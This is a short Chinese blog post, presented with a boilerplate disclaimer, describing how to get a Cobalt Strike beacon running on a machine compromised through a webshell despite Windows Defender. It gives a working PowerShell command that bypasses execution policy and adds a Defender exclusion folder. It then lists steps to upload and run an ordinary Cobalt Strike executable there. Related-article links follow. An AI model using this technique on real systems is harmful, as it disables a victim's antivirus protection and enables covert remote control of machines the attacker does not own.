不会写免杀也能轻松过defender上线CS

简介: 不会写免杀也能轻松过defender上线CS

免责声明



本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

只供对已授权的目标使用测试,对未授权目标的测试作者不承担责任,均由使用本人自行承担。


文章正文


偶然看到了通过powershell操作defender来添加排除项

https://docs.microsoft.com/en-us/powershell/module/defender/?view=windowsserver2019-ps

所以就有了这个场景:

假设我们拿到目标机器的webshell,对方开着Windows defender,在不会写免杀的情况下,上线CS:

添加排除项:

powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\justtest"

CS生成一个普通的exe马:

上传到justtest目录:

运行:

上线:


相关文章
|
Web App开发 数据采集 前端开发
基于Python的Selenium详解:从入门到实践
基于Python的Selenium详解:从入门到实践
884 0
|
小程序 前端开发 Java
【实训项目】智联校友会小程序
【实训项目】智联校友会小程序
351 0
|
存储 安全 API
Windows Server 2022 21H2 本地域权限提升漏洞(PetitPotam)
Windows Server 2022 Standard/Datacenter 存在本地域权限提升漏洞,攻击者可通过使用PetitPotam工具进行获取服务器SYSTEM权限。
1145 1
|
测试技术 数据库 Android开发
大学生心理健康APP的设计与实现
大学生心理健康APP的设计与实现
1190 0
|
前端开发
css动画(仿微信聊天页面)
css动画(仿微信聊天页面)
|
Python Windows
ping命令无法使用~弹出ping.py
ping命令无法使用~弹出ping.py
334 0
|
安全 Linux 数据安全/隐私保护
Linux DirtyPipe 内核提权漏洞 (CVE-2022-0847)
它是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。
567 1
|
安全 测试技术 Go
新版掩日——免杀Windows Defender
新版掩日——免杀Windows Defender
1222 0
|
网络协议 安全 fastjson
Fastjson姿势技巧集合 1
Fastjson姿势技巧集合
759 0
|
安全 Shell

热门文章

最新文章

下一篇
开通oss服务